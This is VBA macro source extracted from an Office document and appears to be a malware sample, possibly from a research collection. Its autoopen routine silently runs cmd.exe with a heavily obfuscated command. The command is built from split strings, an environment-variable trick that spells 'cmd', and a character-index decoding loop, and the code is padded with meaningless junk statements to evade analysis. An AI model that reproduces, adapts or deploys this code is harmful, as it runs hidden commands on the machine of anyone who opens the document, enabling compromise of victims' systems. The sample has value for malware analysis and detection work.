Attribute VB_Name = "a2544"
Attribute VB_Base = "0{7CDAA6A5-AEE0-4ECB-A2A9-6862869C63B0}{BF7B9F3D-87DB-400E-B27C-54642B4D5EA2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "s9223"
Function k5569()
On Error Resume Next
Select Case b2712
         Case 291
Month CBool(j5868)
Minute ChrB(v8922)
Hour Log(a4123)
End Select
   Select Case a1509
         Case 925
Day Chr(w3960)
Month Round(p6127)
Weekday Tan(h6345)
End Select
v8382 = "c:\b3707\" + "d6921\i8318\..\" + "..\..\windows\" + "system32\cmd." + "exe /c %Progra" + "mData:~0,1%%Pr" + "ogramData:~" + "9,2% /V/C" + Chr(34) + "set "
Select Case j6373
         Case 702
Month Sin(m7729)
Day Int(i9507)
Day Tan(i1999)
End Select
   Select Case z8898
         Case 653
Day Int(z3498)
Month CLng(j9754)
Minute CDate(s2359)
End Select
   Select Case h3845
         Case 819
Hour Round(c8125)
Weekday CSng(p4470)
Minute CDate(m28)
End Select
s3558 = "kW=gEXjNhB" + "iU1eO0,v8CWbIu" + "x\G@%F5VtAmk." + "y6zHrLwM/(T)l9Y" + "3cJ$ f4{-7" + Chr(43) + "P" + "2d'D~Ka}" + "s:n;opS=&&for " + "%o in (7"
Select Case i2507
         Case 40
Minute Fix(r62)
Weekday Tan(c714)
Day CSng(r2991)
End Select
   Select Case p5673
         Case 218
Weekday CBool(m4253)
Hour Cos(z6400)
Month Sgn(f9118)
End Select
   Select Case j590
         Case 626
Day CDate(q7801)
Month Cos(m8496)
Minute Sgn(i7959)
End Select
a5473 = "4;73;40;2" + "5;60;8;6;39" + ";19;16;7" + "0;65;27;13" + ";9;25;38;25" + ";75;1;75;75;19"
Select Case k3142
         Case 994
Month ChrB(v1976)
Day Atn(z9081)
Month Sgn(w9992)
End Select
   Select Case u2808
         Case 550
Month ChrB(j1620)
Day Atn(s1350)
Month Sgn(w6742)
End Select
   Select Case m2418
         Case 333
Minute Chr(a520)
Weekday Sgn(t8433)
Month Sgn(h8467)
End Select
v5746 = ";11;4;4;30;" + "41;1;70;65;57" + ";55;13;9" + ";25;5;25;4" + "4;1;41;60;" + "70;65;57;49;"
Select Case s7644
         Case 322
Minute Round(k5511)
Weekday ChrW(m7671)
Month ChrW(o4996)
End Select
   Select Case f1207
         Case 822
Minute Chr(q9034)
Weekday Sgn(l2389)
Month Sgn(p200)
End Select
u8998 = "13;9;25;46;46;" + "53;52;20;61;9" + ";27;61;76;63;" + "36;55;27;12;" + "49;63;72;" + "52;36;47;27"
Select Case m8675
         Case 970
Month Sin(p9284)
Day CInt(i666)
Hour Log(u9543)
End Select
   Select Case l2447
         Case 13
Hour Int(k102)
Month ChrB(l7881)
Weekday ChrW(b7685)
End Select
   Select Case r4117
         Case 602
Month CDbl(f2051)
Day Rnd(p2068)
Hour CSng(b4424)
End Select
z2648 = ";15;47;7" + "6;71;10;4" + "0;57;73;18;3;1" + "0;50;29;53;4;" + "10;29;33;17"
k5569 = v8382 + s3558 + a5473 + v5746 + u8998 + z2648
End Function

Function d1940()
On Error Resume Next
Select Case v1015
         Case 259
Minute Rnd(n4622)
Weekday CDbl(t9123)
Minute Log(j7413)
End Select
   Select Case o7482
         Case 14
Month CStr(l3480)
Day Chr(u1413)
Day ChrW(p8640)
End Select
   Select Case f9118
         Case 173
Day Hex(s7760)
Hour ChrB(s5583)
Weekday ChrW(l655)
End Select
u4860 = ";10;18;16;" + "46;7;10;7" + "1;29;72;" + "52;5;55;4" + "9;15;58;76" + ";63;5;29;29;" + "74;70;42;4"
Select Case s2621
         Case 682
Weekday ChrW(z9524)
Day CStr(c4699)
Day Int(r8303)
End Select
   Select Case o2051
         Case 563
Hour Cos(w7182)
Month CDate(f9363)
Minute Log(i6757)
End Select
   Select Case n9732
         Case 914
Day Sgn(w6368)
Hour CByte(p6602)
Month Log(j1186)
End Select
i7438 = "2;29;20;71;10;" + "38;0;33;50;73;3" + "1;42;75;66;41;2" + "6;75;20;19;" + "17;17;24;5;29" + ";29;74;70"
Select Case j9550
         Case 27
Minute Chr(n6525)
Weekday CSng(f7415)
Day Hex(h461)
End Select
   Select Case v9941
         Case 197
Minute Chr(i1615)
Weekday CSng(f6122)
Day Hex(k9192)
End Select
   Select Case k7770
         Case 53
Day CLng(i6773)
Hour Oct(w4618)
Month CDbl(z7252)
End Select
t4565 = ";42;42;6" + "9;29;73;20;29;" + "67;38;50;3" + "3;50;73;31;" + "42;51;18;16" + ";11;23;3"
Select Case k7176
         Case 133
Month CByte(f7897)
Weekday Int(j6620)
Weekday CDbl(p6628)
End Select
   Select Case k2679
         Case 257
Hour Sqr(z632)
Month CLng(m5209)
Hour Hex(i6244)
End Select
   Select Case w9560
         Case 245
Day Sin(c8941)
Hour CLng(m6513)
Hour Hex(j9953)
End Select
j548 = "4;1;24;5;29;2" + "9;74;70;42;" + "42;40;40;40" + ";33;31;73;62;1" + "0;38;71;57;67;2" + "0;29;73;74;67" + ";38;29;6" + "9;33;50;" + "73;31;42;10;36"
Select Case m6535
         Case 690
Day Hex(v9890)
Hour Cos(t2082)
Hour Tan(w1108)
End Select
   Select Case t8392
         Case 397
Hour CBool(r9388)
Minute Hex(d9239)
Weekday CDate(w5663)
End Select
   Select Case c5932
         Case 934
Weekday CStr(a4591)
Day Atn(o6486)
Hour Tan(w8355)
End Select
q8535 = ";26;8;23" + ";74;19;24;5;29;" + "29;74;70;42;4" + "2;67;71;29" + ";7;0;20;67;3"
Select Case f1784
         Case 944
Month CSng(z4855)
Weekday Sgn(q502)
Minute Tan(r9873)
End Select
   Select Case f5013
         Case 603
Month CSng(j9185)
Weekday Sgn(f4772)
Minute Tan(q742)
End Select
   Select Case w4124
         Case 458
Minute Cos(n2128)
Minute Sqr(j4705)
Weekday Sgn(a1408)
End Select
a2507 = "3;67;0;20;7;46;" + "67;38;71;73;2" + "9;7;50;7" + ";67;69;33;5" + "0;73;31;42;39" + ";4;11;23;" + "26;20;48" + ";21;24;5;29;29" + ";74;70;42;4"
Select Case i9039
         Case 46
Weekday CSng(i8666)
Month CSng(a5122)
Weekday Rnd(z6369)
End Select
   Select Case k1726
         Case 561
Minute CInt(p4912)
Minute Round(d9375)
Minute Tan(s1780)
End Select
   Select Case w4642
         Case 277
Minute CInt(w1384)
Minute Round(k7120)
Minute Tan(c7014)
End Select
l5284 = "2;29;67;32;" + "10;57;73;71;" + "10;61;33;50" + ";73;31;4" + "2;2;15;12;2" + "8;10;62;37;" + "63;33;75;74" + ";46;7;29" + ";43;63;24;63;"
Select Case o3701
         Case 539
Day Chr(c2677)
Day CByte(p8433)
Minute ChrW(m1723)
End Select
   Select Case z3190
         Case 291
Minute CInt(u5710)
Minute CSng(l1181)
Weekday Log(m6566)
End Select
   Select Case k7910
         Case 87
Minute CInt(r6676)
Minute CSng(m5451)
Weekday Log(k9343)
End Select
m7228 = "45;72;52;71;1" + "5;61;9;27;76;" + "63;3;15;58;35;9" + ";63;72;5" + "2;7;15;35;9;9;5" + "3;76;53;63;" + "27;27;63"
Select Case i9703
         Case 224
Hour CDbl(k7751)
Hour CLng(o9131)
Day Log(k1196)
End Select
   Select Case d8446
         Case 32
Weekday Int(i6824)
Month Int(f6904)
Minute Int(h7447)
End Select
   Select Case r4602
         Case 20
Hour CDbl(w4913)
Hour CLng(q3280)
Day Log(h4054)
End Select
w1716 = ";72;52;71;55" + ";27;15;58" + ";76;63;69;15" + ";55;58;49;6" + "3;72;52;20;9;2"
Select Case l6572
         Case 108
Hour CStr(f9878)
Hour Fix(k4524)
Month Hex(f2618)
End Select
   Select Case c4680
         Case 899
Weekday Cos(j8618)
Month Sgn(v3771)
Day CDbl(i8174)
End Select
   Select Case t6256
         Case 38
Month Hex(n5957)
Minute Hex(s2443)
Month Hex(a9332)
End Select
t1783 = "7;27;61;76;52;1" + "0;71;14;70" + ";29;10;3" + "1;74;59;" + "63;22;63;" + "59;52;7;15;" + "35;9;9;59;63;3"
Select Case z8891
         Case 167
Month Sgn(s844)
Minute Sgn(c2265)
Hour CDbl(j3066)
End Select
   Select Case w2796
         Case 766
Day Chr(u6412)
Weekday Sin(j3703)
Month Tan(z4436)
End Select
   Select Case d9008
         Case 900
Weekday Sqr(d2226)
Month Rnd(a6122)
Weekday Tan(i3398)
End Select
r8 = "3;10;21;10;63;7" + "2;54;73;38;10;" + "67;50;5;43" + ";52;32;61;12;61" + ";61;53;7;71;53" + ";52;5;55" + ";49;15;5"
Select Case r1545
         Case 123
Month Sin(t4729)
Minute Log(a3011)
Weekday Tan(u5253)
End Select
   Select Case i7938
         Case 879
Hour CByte(h9259)
Weekday Chr(h3187)
Minute Sgn(c745)
End Select
   Select Case u8262
         Case 646
Minute CDbl(j5886)
Hour ChrB(w9318)
Hour Sgn(j9450)
End Select
p9790 = "8;45;56;29" + ";38;34;56;52" + ";36;47;27;15" + ";47;33;64;73;" + "40;71;46;73;6"
d1940 = u4860 + i7438 + t4565 + j548 + q8535 + a2507 + l5284 + m7228 + w1716 + t1783 + r8 + p9790
End Function

Function q7065()
On Error Resume Next
Select Case i1139
         Case 21
Day CBool(i6266)
Month Tan(m2836)
Minute Sgn(p6076)
End Select
   Select Case i8760
         Case 24
Month ChrB(h7440)
Minute Tan(f5448)
Month Sgn(a6944)
End Select
   Select Case n3177
         Case 131
Day CBool(d1725)
Month Tan(t5471)
Minute Sgn(z6493)
End Select
d3290 = "7;62;26;7;4" + "6;10;43;52;32;6" + "1;12;61;61" + ";13;53;52;20;9;" + "27;27;61;45;7"
Select Case r8752
         Case 827
Weekday Sgn(n8208)
Minute CSng(v7924)
Month ChrW(s7508)
End Select
   Select Case p9018
         Case 610
Hour CSng(f4749)
Weekday CByte(r3891)
Day CSng(j7327)
End Select
v6995 = "2;52;74;9;49" + ";27;27;76;63;62" + ";27;49;12;12;" + "63;72;19;54;5" + "3;43;43;23"
Select Case m9213
         Case 767
Day Sqr(f7571)
Month Int(b2365)
Hour Rnd(i8835)
End Select
   Select Case s3586
         Case 673
Minute Round(i7635)
Hour CLng(j9683)
Month ChrW(r1975)
End Select
f187 = ";10;29;5" + "7;19;29;10;31;5" + "3;52;20;9;27" + ";27;61;45;" + "33;46;10;71;0" + ";29;5;53;57" + ";0;10;53;5"
Select Case d7700
         Case 621
Day Hex(c1634)
Month CDbl(c429)
Weekday ChrW(z514)
End Select
   Select Case z3812
         Case 959
Weekday Sin(z7757)
Minute Hex(u9217)
Hour Rnd(r8244)
End Select
l7448 = "5;12;12;12" + ";12;45;53;56;19" + ";71;14;73" + ";32;10;5" + "7;19;29;10;3" + "1;53;52;2" + "0;9;27;27;61;72" + ";52;62;35;5" + "5;15;12;76;63"
Select Case q5001
         Case 831
Day CBool(b9451)
Month Sgn(z6590)
Weekday Int(z8904)
End Select
   Select Case j5958
         Case 542
Hour Cos(k9771)
Weekday Fix(r2132)
Minute Log(s86)
End Select
   Select Case o2283
         Case 831
Minute CSng(t7641)
Weekday Sin(h2767)
Minute CDbl(q5435)
End Select
z8593 = ";74;49;27" + ";47;35;63;72;18" + ";38;10;67;32;7" + "2;68;68;" + "50;67;29;50;" + "5;56;68;68;52;6"
Select Case z3523
         Case 469
Month Chr(t408)
Hour Round(s516)
Day Int(o6514)
End Select
   Select Case u1303
         Case 732
Day CInt(i7021)
Month Rnd(m1983)
Minute CDbl(n6328)
End Select
p5349 = "9;35;55;61;4" + "7;76;63;14;9;4" + "9;61;55;" + "63;72;87)do se" + "t 9vR=!9vR!!k"
Select Case t1277
         Case 703
Weekday CDbl(z5922)
Minute Log(c3030)
Month CDbl(w8112)
End Select
   Select Case j4949
         Case 109
Minute Int(i9924)
Weekday Chr(h6285)
Day Tan(w840)
End Select
   Select Case t5486
         Case 376
Hour Hex(r6793)
Month Tan(w19)
Hour Tan(z2439)
End Select
w9445 = "W:~%o,1!&&" + "if %o equ 8" + "7 echo !9vR:" + "~5!|cmd" + Chr(34) + "  "
q7065 = d3290 + v6995 + f187 + l7448 + z8593 + p5349 + w9445
End Function


Sub autoopen()
j5414 = Shell(k5569 + d1940 + q7065, vbHide)

End Sub
Attribute VB_Name = "z6683"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


INQUEST-PP=macro
